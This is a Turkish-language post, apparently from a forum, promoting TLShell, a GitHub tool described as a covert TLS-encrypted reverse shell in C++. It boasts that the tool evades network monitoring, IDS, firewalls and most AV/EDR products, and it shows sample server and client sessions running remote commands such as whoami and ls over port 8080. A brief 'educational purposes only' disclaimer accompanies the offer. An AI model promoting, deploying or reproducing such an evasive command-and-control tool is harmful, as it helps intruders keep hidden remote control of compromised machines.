Kaynak kodu: GitHub - umutcamliyurt/TLShell: A covert reverse shell using TLS
TLS kullanan gizli bir reverse shell
Açıklama:
TLS ile şifrelenmiş bir reverse shell, bir saldırgan ile hacklenmiş bir sistem arasındaki iletişim için önemli güvenlik ve gizlilik avantajları sağlar. Geleneksel reverse shell, verileri düz metin olarak göndererek onları ağ izleme araçları, izinsiz giriş tespit sistemleri (IDS) veya güvenlik duvarları tarafından tespit edilmeye veya müdahale edilmeye karşı savunmasız hale getirir. Ancak TLS şifrelemesi ile saldırgan ile hedef makine arasındaki iletişim şifrelenir, böylece gizlilik sağlanır ve şifrelenmemiş trafiği denetleyen güvenlik araçları tarafından tespit edilme riski azalır.
Uyarı:
Bu araç yalnızca eğitim amaçlı yapılmıştır. Geliştirici, bu aracın kullanımından kaynaklanan herhangi bir yanlış kullanımdan veya istenmeyen sonuçlardan sorumlu değildir.
Özellikler:
- Çoğu AV/EDR çözümü tarafından algılanamaz
- C++ ile yazıldı
- Şifreli Komuta ve Kontrol
Teknik detaylar:
- Şifreleme için TLS 1.3
Server:
nemesis@localhost:~/Projects/TLShell$ ./server 8080Server listening on port 8080...
Client connected!
Enter command to send to client (type 'exit' to quit): whoami
Client output: nemesis
Enter command to send to client (type 'exit' to quit): ls
Client output: client
client.cpp
image.png
LICENSE
README.md
server
server.cpp
server.crt
server.key
Enter command to send to client (type 'exit' to quit):
Client:
nemesis@localhost:~/Projects/TLShell$ ./client 127.0.0.1 8080Connected to server 127.0.0.1:8080!
Son düzenleme:
